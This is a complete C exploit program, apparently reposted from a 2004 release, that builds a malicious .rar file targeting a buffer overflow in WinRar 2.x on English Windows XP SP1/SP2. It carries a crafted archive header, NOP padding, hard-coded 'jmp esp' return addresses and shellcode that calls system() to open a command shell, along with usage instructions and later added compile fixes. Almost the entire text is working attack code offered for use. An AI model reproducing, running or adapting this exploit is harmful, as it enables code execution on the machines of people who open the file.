
WinRar local buffer overflow exploit V1.0

WinRar local buffer overflow exploit V1.0

文章作者:atmaca@prohack.net
/*
* WinRar local buffer overflow exploit V1.0
* Coded By ATmaCA
* Copyright (c) 2004 ProGroup Software, Inc.
* E-Mail:atmaca@prohack.net
* Web: www.prohack.net
* Usage: exploit <Target> <OutputPath>
* Targets:
* 1 - WinXP SP1 user32.dll [0x77D718FC]
* 2 - WinXP SP2 user32.dll [0x77D8AF0A]
* Example:exploit 1 myrar.rar
*/

/*
* All WinRar 2.x releases are affected; the 3.x series is not affected.
* If you want to test and you do not have WinRar V2.x
* you can download it from [url]http://atmaca.prorat.net/Src/winrar.zip[/url]
*
* Note: the return addresses (user32.dll "jmp esp") and the system()
* addresses (msvcrt.dll) below are hard-coded for the English WinXP SP1
* and SP2 builds listed in the usage text. Other service packs, locales or
* patched DLLs will have different addresses and the generated file will
* simply crash the target instead of spawning a shell.
*/

#include <conio.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memcpy */

#ifdef __BORLANDC__
     #include <mem.h>
#endif

#define NOP 0x90   /* x86 single-byte no-op; repeated to build the padding/sled bytes */

/*crafted rar header*/
/*
 * Crafted RAR archive header that is written before the overflow payload.
 * The first seven bytes spell "Rar!" followed by 1A 07 00 (the archive
 * marker); the remaining bytes are the header fields captured by the
 * original author and are emitted verbatim -- the field layout is not
 * documented here, so treat them as opaque.
 * The array carries an implicit trailing NUL, so writers use sizeof - 1.
 */
char winrar_header[] =
    /* marker block */
    "\x52\x61\x72\x21\x1A\x07\x00"
    /* remaining header bytes, copied as-is */
    "\xCF\x90\x73\x00\x00\x0D\x00\x00\x00"
    "\x00\x00\x00\x00\x4A\x91\x74\x80\x80\x35\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x02\x00\x00\x00\x00\x12";

/*launch a local cmd.exe*/
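/*
 * Payload: pushes the bytes "cmd " onto the stack, hands their address to
 * system() and calls it, i.e. spawns a local shell.
 *
 * Layout (offsets from the start of the array):
 *   +0   68 "cmd "        push imm32
 *   +5   8B C4            mov eax, esp
 *   +7   50               push eax          (argument for system())
 *   +8   B8 xx xx xx xx   mov eax, imm32    (address of msvcrt!system())
 *   +13  FF D0            call eax
 *
 * The four bytes at offset 9 are only a placeholder (the WinXP SP2 value);
 * main() overwrites them with sysadrr[target] before the payload is written,
 * so the offset 9 and width 4 used there must stay in sync with this layout.
 * NOTE(review): the pushed dword "cmd " is not NUL-terminated; whether the
 * command string ends there depends on the stack contents that follow it.
 *
 * The original listing had its "msvcrt.dll" comment wrapped onto a line of
 * its own, which turned it into code and broke compilation; fixed here.
 */
char shellcode[] =
    "\x68" "cmd "               /* push "cmd " */
    "\x8B\xC4"                  /* mov eax, esp */
    "\x50"                      /* push eax */
    "\xB8\xC7\x93\xC2\x77"      /* mov eax, 0x77C293C7 -- system() on WinXP SP2
                                   msvcrt.dll; patched at run time by main() */
    "\xFF\xD0"                  /* call eax */
    ;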

/*
 * Return-address candidates, one per supported target (index = target - 1).
 * Each entry is the little-endian encoding of a user32.dll address that the
 * author identified as a "jmp esp" gadget; it is written over the saved EIP
 * so execution lands in the NOP bytes that follow it in the file.
 * No entry contains a NUL byte -- the original writer used "%s" on them.
 */
char *target[] = {
    /* 1: WinXP SP1 user32.dll, 0x77D718FC */
    "\xFC\x18\xD7\x77",
    /* 2: WinXP SP2 user32.dll, 0x77D8AF0A */
    "\x0A\xAF\xD8\x77",
};

/*
 * msvcrt.dll system() addresses, little-endian, indexed like target[].
 * main() copies the selected entry into shellcode[] at offset 9 (the imm32
 * operand of the "mov eax" instruction) before writing the payload.
 * No entry contains a NUL byte.
 */
char *sysadrr[] = {
    /* 1: WinXP SP1 msvcrt.dll, 0x77C28044 */
    "\x44\x80\xC2\x77",
    /* 2: WinXP SP2 msvcrt.dll, 0x77C293C7 */
    "\xC7\x93\xC2\x77",
};

/* File-scope scratch state (historically used directly by main()). */
int   i;          /* loop counter */
int   targetnum;  /* zero-based target index derived from argv[1] */
FILE  *di;        /* output archive handle */

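/* Byte counts of the NOP padding around the overwritten return address. */
enum {
    PAD_BEFORE_EIP = 1051,   /* bytes between the crafted header and saved EIP */
    PAD_AFTER_EIP = 50,      /* sled between the return address and the payload */
    PAD_AFTER_SHELLCODE = 50 /* trailing padding after the payload */
};

/* Write n copies of the NOP byte; returns 1 on success, 0 on a write error. */
static int write_nops(FILE *out, size_t n)
{
    size_t k;
    for (k = 0; k < n; k++) {
        if (fputc(NOP, out) == EOF) {
            return 0;
        }
    }
    return 1;
}

/* Write exactly len bytes from buf; returns 1 on success, 0 on a short write. */
static int write_bytes(FILE *out, const void *buf, size_t len)
{
    return fwrite(buf, 1, len, out) == len;
}

/*
 * Entry point: generate a .rar file that triggers the WinRar 2.x overflow.
 *
 * argv[1] selects the target (1-based index into target[] / sysadrr[]),
 * argv[2] is the output path. The file written is:
 *   crafted header | PAD_BEFORE_EIP NOPs | 4-byte "jmp esp" address |
 *   PAD_AFTER_EIP NOPs | shellcode (system() address patched in) |
 *   PAD_AFTER_SHELLCODE NOPs
 *
 * Returns 0 on success, 1 on usage error, invalid target or I/O failure.
 * Side effect: patches sysadrr[target] into the global shellcode[] at
 * offset 9 (the imm32 operand of its "mov eax" instruction).
 *
 * Fixes versus the original listing: usage strings that had been wrapped
 * across lines (compile error), the target index was never range-checked
 * (out-of-bounds read of target[]/sysadrr[] for any value other than 1 or
 * 2), the return address was written with "%s" (only works because the
 * addresses contain no NUL), and write/close errors were ignored.
 */
int main(int argc, char *argv[])
{
    const size_t ntargets = sizeof(target) / sizeof(target[0]);
    long choice;
    char *end;
    int tnum;
    FILE *out;

    if (argc < 3) {
        printf("\r\nWinRar local buffer overflow exploit V1.0\r\n");
        printf("Coded By ATmaCA\r\n");
        printf("Copyright ? 2004 ProGroup Software, Inc.\r\n");
        printf("E-Mail:atmaca@prohack.net\r\n");
        printf("Web:[url]www.prohack.net[/url]\r\n\r\n");
        printf("Usage:\r\nexploit <Target> <OutputPath>\r\n\r\n");
        printf("Targets:\n");
        printf("1 - WinXP SP1 english user32.dll [0x77D718FC]\n");
        printf("2 - WinXP SP2 english user32.dll [0x77D8AF0A]\n");
        printf("Example:exploit 1 myrar.rar\n");
        return 1;
    }

    /* Validate the target before touching the filesystem: an out-of-range
     * index would read past the end of target[] and sysadrr[]. */
    choice = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || choice < 1 || choice > (long)ntargets) {
        printf("Invalid target %s (expected 1..%u)\n", argv[1], (unsigned)ntargets);
        return 1;
    }
    tnum = (int)(choice - 1);

    if ((out = fopen(argv[2], "wb")) == NULL) {
        printf("Error opening file!\n");
        return 1;
    }

    /* The system() address sits at shellcode+9, right after the 0xB8
     * ("mov eax, imm32") opcode at shellcode+8. */
    memcpy(shellcode + 9, sysadrr[tnum], 4);

    if (!write_bytes(out, winrar_header, sizeof(winrar_header) - 1) ||
        !write_nops(out, PAD_BEFORE_EIP) ||
        /* overwrite the saved return address with the "jmp esp" gadget */
        !write_bytes(out, target[tnum], 4) ||
        !write_nops(out, PAD_AFTER_EIP) ||
        !write_bytes(out, shellcode, sizeof(shellcode) - 1) ||
        !write_nops(out, PAD_AFTER_SHELLCODE)) {
        printf("Error writing file!\n");
        fclose(out);
        return 1;
    }

    /* fclose() flushes buffered output; a failure here means a truncated file. */
    if (fclose(out) != 0) {
        printf("Error closing file!\n");
        return 1;
    }

    printf("Exploit rar file %s has been generated!\n", argv[2]);
    return 0;
}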

